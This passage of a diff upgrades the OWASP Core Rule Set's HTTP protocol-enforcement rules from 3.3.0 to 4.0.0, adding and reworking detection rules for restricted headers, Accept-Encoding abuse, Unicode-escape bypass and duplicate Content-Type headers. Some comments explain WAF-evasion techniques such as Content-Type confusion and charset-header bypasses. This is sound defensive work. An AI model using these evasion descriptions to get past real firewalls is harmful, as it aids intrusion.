ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.extension=.%{tx.1}/',\ chain" SecRule TX:EXTENSION "@within %{tx.restricted_extensions}" \ "t:none,t:urlDecodeUni,t:lowercase,\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Backup or "working" file extension @@ -1042,7 +1120,7 @@ SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \ # SecRule REQUEST_FILENAME "@rx \.[^.~]+~(?:/.*|)$" \ "id:920500,\ - phase:2,\ + phase:1,\ block,\ t:none,t:urlDecodeUni,\ msg:'Attempt to access a backup or working file',\ @@ -1055,38 +1133,47 @@ SecRule REQUEST_FILENAME "@rx \.[^.~]+~(?:/.*|)$" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Restricted HTTP headers # # -=[ Rule Logic ]=- -# The use of certain headers is restricted. They are listed in the variable -# TX.restricted_headers. -# -# The headers are transformed into lowercase before the match. In order to -# make sure that only complete header names are matching, the names in -# TX.restricted_headers are wrapped in slashes. This guarantees that the -# header Range (-> /range/) is not matching the restricted header -# /content-range/ for example. +# The use of certain headers is restricted. They are listed in two variables: +# - TX.restricted_headers_basic: Known security risks, always forbidden (rule +# 920450) +# - TX.restricted_headers_extended: Possible false positives, possible security +# risks, may be forbidden (rule 920451) +# +# The headers are transformed into lowercase before the match. In order to make +# sure that only complete header names match, the names in the +# TX.restricted_headers_* variables are wrapped in slashes. This guarantees that +# the Range header (which becomes /range/) will not match the restricted +# /content-range/ header, for example. # # This is a chained rule, where the first rule fills a set of variables of the -# form TX.header_name_. The second rule is then executed for all -# variables of the form TX.header_name_. +# form TX.header_name__. The second rule is then executed +# for all variables of the form TX.header_name__. # # As a consequence of the construction of the rule, the alert message and the # alert data will not display the original header name Content-Range, but # /content-range/ instead. # +# This rule has a stricter sibling, 920451, which matches against the variable +# TX.restricted_headers_extended. It handles deprecated headers that are still +# in use (so false positives are possible, hence unsuitable for blocking in a +# default paranoia level 1 installation) and headers with possible security +# risks. # # -=[ References ]=- # https://access.redhat.com/security/vulnerabilities/httpoxy (Header Proxy) +# https://www.sidechannel.blog/en/http-method-override-what-it-is-and-how-a-pentester-can-use-it # SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ "id:920450,\ - phase:2,\ + phase:1,\ block,\ capture,\ t:none,t:lowercase,\ @@ -1100,17 +1187,158 @@ SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',\ + setvar:'tx.header_name_920450_%{tx.0}=/%{tx.0}/',\ chain" - SecRule TX:/^header_name_/ "@within %{tx.restricted_headers}" \ - "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + SecRule TX:/^header_name_920450_/ "@within %{tx.restricted_headers_basic}" \ + "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# Rule against CVE-2022-21907 +# This rule blocks Accept-Encoding headers longer than 50 characters. +# The length of 50 is a heuristic based on the length of values from +# the RFC (https://datatracker.ietf.org/doc/rfc9110/) +# and the respective values assigned by IANA +# (https://www.iana.org/assignments/http-parameters/http-parameters.xml#content-coding). +# +# This rule has a stricter sibling: 920521 +# +SecRule REQUEST_HEADERS:Accept-Encoding "@gt 50" \ + "id:920520,\ + phase:1,\ + block,\ + t:none,t:lowercase,t:length,\ + msg:'Accept-Encoding header exceeded sensible length',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restrict response charsets that we allow. +# The following rules make sure that the response will be in an ASCII-compatible charset that +# phase 4 rules can properly understand and block. +# + +# +# Some servers rely on the request Accept header to determine what charset to respond with. +# This rule restricts these to familiar charsets. +# +# Regular expression generated from regex-assembly/920600.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 920600 +# +SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*(?:[\s\v]*,[\s\v]*(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*)*$" \ + "id:920600,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Illegal Accept header: charset parameter',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Unicode character bypass check for non JSON requests +# See reported bypass in issue: +# https://github.com/coreruleset/coreruleset/issues/2512 +# +SecRule REQBODY_PROCESSOR "!@streq JSON" \ + "id:920540,\ + phase:2,\ + block,\ + t:none,\ + msg:'Possible Unicode character bypass detected',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/267/72',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + chain" + SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?i)\x5cu[0-9a-f]{4}" \ + "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Disallow any raw URL fragments. The '#' character should be omitted or URL-encoded. +# CRS rules generally do not check REQUEST_URI_RAW, but some servers accept the fragment as part of the URL path/query. +# This creates false negative evasions. +# +SecRule REQUEST_URI_RAW "@contains #" \ + "id:920610,\ + phase:1,\ + block,\ + t:none,\ + msg:'Raw (unencoded) fragment in request URI',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# The following rule (920620) checks for the presence of 2 or more request Content-Type headers. +# Content-Type confusion poses a significant security risk to a web application. It occurs when +# the server and client have different interpretations of the Content-Type header, leading to +# miscommunication, potential exploitation and WAF bypass. +# +# Using Apache, when multiple Content-Type request headers are received, the server combines them +# into a single header with the values separated by commas. For example, if a client sends multiple +# Content-Type headers with values "application/json" and "text/plain", Apache will combine them +# into a single header like this: "Content-Type: application/json, text/plain". +# +# On the other hand, Nginx handles multiple Content-Type headers differently. It preserves each +# header as a separate entity without combining them. So, if a client sends multiple Content-Type +# headers, Nginx will keep them separate, maintaining the original values. +# +SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \ + "id:920620,\ + phase:1,\ + block,\ + t:none,\ + msg:'Multiple Content-Type Request Headers',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # # @@ -1135,7 +1363,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,skipAf SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ "id:920200,\ - phase:2,\ + phase:1,\ block,\ t:none,\ msg:'Range: Too many fields (6 or more)',\ @@ -1147,11 +1375,11 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ chain" SecRule REQUEST_BASENAME "!@endsWith .pdf" \ - "setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" # # This is a sibling of rule 920200 @@ -1159,9 +1387,9 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d SecRule REQUEST_BASENAME "@endsWith .pdf" \ "id:920201,\ - phase:2,\ + phase:1,\ block,\ - t:none,\ + t:none,t:urlDecodeUni,\ msg:'Range: Too many fields for pdf request (63 or more)',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ @@ -1171,11 +1399,11 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ chain" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \ - "setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" SecRule ARGS "@rx %[0-9a-fA-F]{2}" \ @@ -1192,46 +1420,11 @@ SecRule ARGS "@rx %[0-9a-fA-F]{2}" \ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267/120',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ - setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" -# -# Missing Accept Header -# -# -=[ Rule Logic ]=- -# This rule generates a notice if the Accept header is missing. -# -# Notice: The rule tries to avoid known false positives by ignoring -# OPTIONS requests coming from known offending User-Agents via two -# chained rules. -# As ModSecurity only reports the match of the last matching rule, -# the alert is misleading. -# -SecRule &REQUEST_HEADERS:Accept "@eq 0" \ - "id:920300,\ - phase:2,\ - pass,\ - t:none,\ - msg:'Request Missing an Accept Header',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-protocol',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/210/272',\ - tag:'PCI/6.5.10',\ - tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'NOTICE',\ - chain" - SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \ - "chain" - SecRule REQUEST_HEADERS:User-Agent "!@pm AppleWebKit Android" \ - "t:none,\ - setvar:'tx.anomaly_score_pl2=+%{tx.notice_anomaly_score}'" - # # PL2: This is a stricter sibling of 920270. # @@ -1249,9 +1442,9 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13, tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1264,7 +1457,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13, SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ "id:920320,\ - phase:2,\ + phase:1,\ pass,\ t:none,\ msg:'Missing User Agent Header',\ @@ -1276,9 +1469,9 @@ SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'NOTICE',\ - setvar:'tx.anomaly_score_pl2=+%{tx.notice_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.notice_anomaly_score}'" # @@ -1298,9 +1491,9 @@ SecRule FILES_NAMES|FILES "@rx ['\";=]" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # @@ -1312,7 +1505,7 @@ SecRule FILES_NAMES|FILES "@rx ['\";=]" \ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ "id:920341,\ - phase:2,\ + phase:1,\ block,\ t:none,\ msg:'Request Containing Content Requires Content-Type header',\ @@ -1323,18 +1516,72 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ chain" SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ "t:none,\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# +# PL2: This is a stricter sibling of 920450. +# +SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ + "id:920451,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'HTTP header is restricted by policy (%{MATCHED_VAR})',\ + logdata:'Restricted header detected: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.header_name_920451_%{tx.0}=/%{tx.0}/',\ + chain" + SecRule TX:/^header_name_920451_/ "@within %{tx.restricted_headers_extended}" \ + "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# Check URL encodings +# +# See comment on rule 920220. +# +SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)application/x-www-form-urlencoded" \ + "id:920240,\ + phase:2,\ + block,\ + t:none,\ + msg:'URL Encoding Abuse Attack Attempt',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/267/72',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_BODY "@rx \x25" \ + "chain" + SecRule REQUEST_BODY "@validateUrlEncoding" \ + "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # # @@ -1357,9 +1604,48 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteR tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# +# Missing Accept Header +# +# This rule has been moved to PL3 +# +# -=[ Rule Logic ]=- +# This rule generates a notice if the Accept header is missing. +# RFC 7231 does not enforce the use of the Accept header. +# It is just typical browser behavior to send and it can indicate a malicious client. +# +# Notice: The rule tries to avoid known false positives by ignoring +# OPTIONS requests, CONNECT requests, and requests coming from known +# offending User-Agents via two chained rules. +# As ModSecurity only reports the match of the last matching rule, +# the alert is misleading. +# +SecRule &REQUEST_HEADERS:Accept "@eq 0" \ + "id:920300,\ + phase:1,\ + pass,\ + t:none,\ + msg:'Request Missing an Accept Header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'NOTICE',\ + chain" + SecRule REQUEST_METHOD "!@rx ^(?:OPTIONS|CONNECT)$" \ + "chain" + SecRule REQUEST_HEADERS:User-Agent "!@pm AppleWebKit Android" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.notice_anomaly_score}'" # @@ -1370,7 +1656,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteR # Note that this only works in combination with a User-Agent prefix. # # This rule is based on a blog post by Soroush Dalili at -# https://soroush.secproject.com/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/ +# https://soroush.me/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/ # SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \ "id:920490,\ @@ -1385,19 +1671,19 @@ SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up" \ "t:none,\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # -# Cache-Control Request Header whitelist +# Cache-Control Request Header allow list # # -=[ Rule Logic ]=- -# This rule aims to strictly whitelist the Cache-Control request header +# This rule aims to strictly allow list the Cache-Control request header # values and to blocks all violations. This should be useful to intercept # "bad bot" and tools that impersonate a real browser but with wrong request # header setup. @@ -1434,21 +1720,49 @@ SecRule &REQUEST_HEADERS:Cache-Control "@gt 0" \ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-protocol',\ - tag:'header-whitelist',\ + tag:'header-allowlist',\ tag:'paranoia-level/3',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ chain" - SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(\s*\,\s*|$)){1,7}$" \ - "setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(?:\s*\,\s*|$)){1,7}$" \ + "setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" +# +# This rule checks for valid Accept-Encoding headers +# +# This rule has a less strict sibling: 920520 +# +# Regular expression generated from regex-assembly/920521.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 920521 +# +SecRule REQUEST_HEADERS:Accept-Encoding "!@rx br|compress|deflate|(?:pack200-)?gzip|identity|\*|^$|aes128gcm|exi|zstd|x-(?:compress|gzip)" \ + "id:920521,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Illegal Accept-Encoding header',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # # @@ -1457,9 +1771,9 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,skipAf SecRule REQUEST_BASENAME "@endsWith .pdf" \ "id:920202,\ - phase:2,\ + phase:1,\ block,\ - t:none,\ + t:none,t:urlDecodeUni,\ msg:'Range: Too many fields for pdf request (6 or more)',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ @@ -1469,11 +1783,11 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ chain" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ - "setvar:'tx.anomaly_score_pl4=+%{tx.warning_anomaly_score}'" + "setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}'" # @@ -1496,16 +1810,16 @@ SecRule ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 38,44-46,48-58,61,65-90 tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # # This is a stricter sibling of 920270. # -SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,65-90,95,97-122" \ +SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:Sec-Fetch-User|!REQUEST_HEADERS:Sec-CH-UA|!REQUEST_HEADERS:Sec-CH-UA-Mobile "@validateByteRange 32,34,38,42-59,61,65-90,95,97-122" \ "id:920274,\ - phase:2,\ + phase:1,\ block,\ t:none,t:urlDecodeUni,\ msg:'Invalid character in request headers (outside of very strict set)',\ @@ -1517,19 +1831,21 @@ SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!RE tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # # This is a stricter sibling of 920270. -# The 'Sec-Fetch-User' header may contain the '?' (63) character. -# Therefore we exclude this header from rule 920274 which forbids '?'. -# https://www.w3.org/TR/fetch-metadata/#http-headerdef-sec-fetch-user +# The headers of this rule are Structured Header booleans, for which only `?0`, +# and `?1` are inconspicuous. +# Structured Header boolean: https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-header-structure-19#section-3.3.6 +# Sec-Fetch-User: https://www.w3.org/TR/fetch-metadata/#http-headerdef-sec-fetch-user +# Sec-CH-UA-Mobile: https://wicg.github.io/ua-client-hints/#sec-ch-ua-mobile # -SecRule REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,63,65-90,95,97-122" \ +SecRule REQUEST_HEADERS:Sec-Fetch-User|REQUEST_HEADERS:Sec-CH-UA-Mobile "!@rx ^(?:\?[01])?$" \ "id:920275,\ - phase:2,\ + phase:1,\ block,\ t:none,t:urlDecodeUni,\ msg:'Invalid character in request headers (outside of very strict set)',\ @@ -1541,9 +1857,9 @@ SecRule REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,63, tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + 